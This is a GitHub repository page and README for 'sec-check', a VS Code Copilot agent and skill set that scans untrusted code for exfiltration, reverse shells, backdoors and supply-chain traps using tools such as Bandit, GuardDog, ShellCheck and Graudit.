Skip to content
/ sec-check Public
forked from alxayo/sec-check

Probably the most SKILLed security agent. Scan untrusted code for red flags before you run it—exfiltration, reverse shells, backdoors, and supply‑chain traps.

0 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

DevExpGbb/sec-check

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
.github
.github
 
 
audit-results
audit-results
 
 
media
media
 
 
research/techniques
research/techniques
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 

Repository files navigation

Sec-Check

sec-check agent

Scan untrusted code for red flags before you run it—exfiltration, reverse shells, backdoors, and supply‑chain traps.

A VS Code Copilot toolkit for scanning code for malicious patterns before running it locally.

What It Does

Sechek provides a custom Copilot agent and security scanning skills to detect dangerous patterns in code—credential theft, reverse shells, backdoors, and supply chain attacks. Use it to review scripts from the internet or untrusted sources before execution.

⚠️ Warning: This tool catches common red flags, not sophisticated attacks. Always use manual review and sandboxing for high-risk code.

sec-check

View results of a full scan here

Components

🤖 Custom Agent

@sechek.security-scanner — Malicious Code Scanner Agent

Deep security analysis with pattern detection and remediation guidance. Detects:

  • Data exfiltration and credential theft
  • Reverse shells and backdoors
  • Persistence mechanisms (cron, registry)
  • Obfuscated payloads (base64, eval)
  • System destruction patterns

Can operate standalone or use security scanning tools (Bandit, GuardDog, ShellCheck, Graudit) when available.

🔧 Security Skills

Skills teach Copilot how to use specific security tools:

Skill Purpose Use For
bandit-security-scan Python AST-based security analysis Python code vulnerabilities, dangerous functions (eval, exec, pickle), SQL injection
guarddog-security-scan Supply chain & malware detection Dependencies (requirements.txt, package.json), typosquatting, malicious packages
shellcheck-security-scan Shell script static analysis Bash/sh scripts, command injection, unquoted variables
graudit-security-scan Multi-language pattern matching Quick scans on unknown codebases, secrets detection, 15+ languages

📝 Custom Prompts

Prompt When to Use
/sechek.tools-advisor Get recommendations on which tools to run based on your codebase
/sechek.tools-scan Execute security tools and save results to tools-audit.md
/sechek.security-scan Full workspace scan with the security scanner agent
/sechek.security-scan-quick Fast scan for malicious patterns, exfiltration, reverse shells
/sechek.security-scan-python Python-focused scan using Bandit and GuardDog
/sechek.security-scan-shell Shell script scan using ShellCheck and Graudit
/sechek.security-scan-supply-chain Scan dependencies for supply chain attacks
/sechek.security-scan-precommit Pre-commit check for secrets and vulnerabilities
/sechek.plan-fix Generate a prioritized remediation plan from scan results
/create-security-skill Create a new security scanning skill from tool documentation

Security Remediation Planning

After running security scans, use /sechek.plan-fix to generate a detailed remediation plan with prioritized tasks, timelines, and fix patterns.

Security Remediation Planning

View a sample remediation plan here

The plan includes:

  • Prioritized tasks grouped by severity (Critical → High → Medium → Low)
  • SLA timelines (24 hours for Critical, 1 week for High, etc.)
  • Fix patterns with vulnerable vs. secure code examples
  • Parallel execution opportunities to speed up remediation
  • Verification commands to confirm fixes

Quick Start

Option 1: Full Scan

/sechek.security-scan

Runs comprehensive analysis using available tools and pattern detection.

Option 2: Targeted Scans

/sechek.security-scan-python       # Python code
/sechek.security-scan-shell        # Shell scripts
/sechek.security-scan-supply-chain # Dependencies

Option 3: Tool Workflow

/sechek.tools-advisor              # Get tool recommendations
/sechek.tools-scan ./src           # Run recommended tools
@sechek.security-scanner           # Deep analysis with tool output

Output

File Generated By Contents
.github/.audit/tools-audit.md /sechek.tools-scan Raw tool output
.github/.audit/scan-results.md @sechek.security-scanner Analysis with findings & remediation

Repository Structure

.github/
├── agents/
│   └── sechek.malicious-code-scanner.agent.md  # Security scanner agent
├── skills/
│   ├── bandit-security-scan/                   # Python security
│   ├── guarddog-security-scan/                 # Supply chain
│   ├── shellcheck-security-scan/               # Shell scripts
│   └── graudit-security-scan/                  # Multi-language
├── prompts/                                    # Custom prompts
└── .context/                                   # Attack patterns reference
research/
└── techniques/                                 # Security research notes

Limitations

  • Pattern-based detection only—may miss obfuscated or novel attacks
  • No guarantee of safety—use as first-pass filter, not final decision
  • Requires manual review for context-dependent vulnerabilities

For production or high-security environments, combine with professional security audits and isolated testing.

About

Probably the most SKILLed security agent. Scan untrusted code for red flags before you run it—exfiltration, reverse shells, backdoors, and supply‑chain traps.

Topics

code ghas

Resources

Readme
Activity
Custom properties

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published